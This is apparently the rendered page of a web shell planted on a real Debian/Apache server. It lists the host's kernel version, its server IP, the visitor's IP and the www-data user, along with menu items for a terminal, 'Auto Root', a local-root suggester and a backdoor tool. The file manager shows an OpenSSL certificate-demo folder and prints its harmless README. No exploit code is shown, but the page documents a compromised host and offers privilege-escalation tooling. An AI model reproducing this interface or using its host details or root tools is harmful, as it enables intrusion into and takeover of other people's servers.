Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.122
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
libssl-doc /
demos /
certs /
Delete
Unzip
Name
Size
Permission
Date
Action
apps
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
README
860
B
-rw-r--r--
2019-09-10 15:16
ca.cnf
2.19
KB
-rw-r--r--
2019-09-10 15:16
mkcerts.sh
3.8
KB
-rw-r--r--
2019-09-10 15:16
ocspquery.sh
798
B
-rw-r--r--
2019-09-10 15:16
ocsprun.sh
392
B
-rw-r--r--
2019-09-10 15:16
Save
Rename
There is often a need to generate test certificates automatically using a script. This is often a cause for confusion which can result in incorrect CA certificates, obsolete V1 certificates or duplicate serial numbers. The range of command line options can be daunting for a beginner. The mkcerts.sh script is an example of how to generate certificates automatically using scripts. Example creates a root CA, an intermediate CA signed by the root and several certificates signed by the intermediate CA. The script then creates an empty index.txt file and adds entries for the certificates and generates a CRL. Then one certificate is revoked and a second CRL generated. The script ocsprun.sh runs the test responder on port 8888 covering the client certificates. The script ocspquery.sh queries the status of the certificates using the test responder.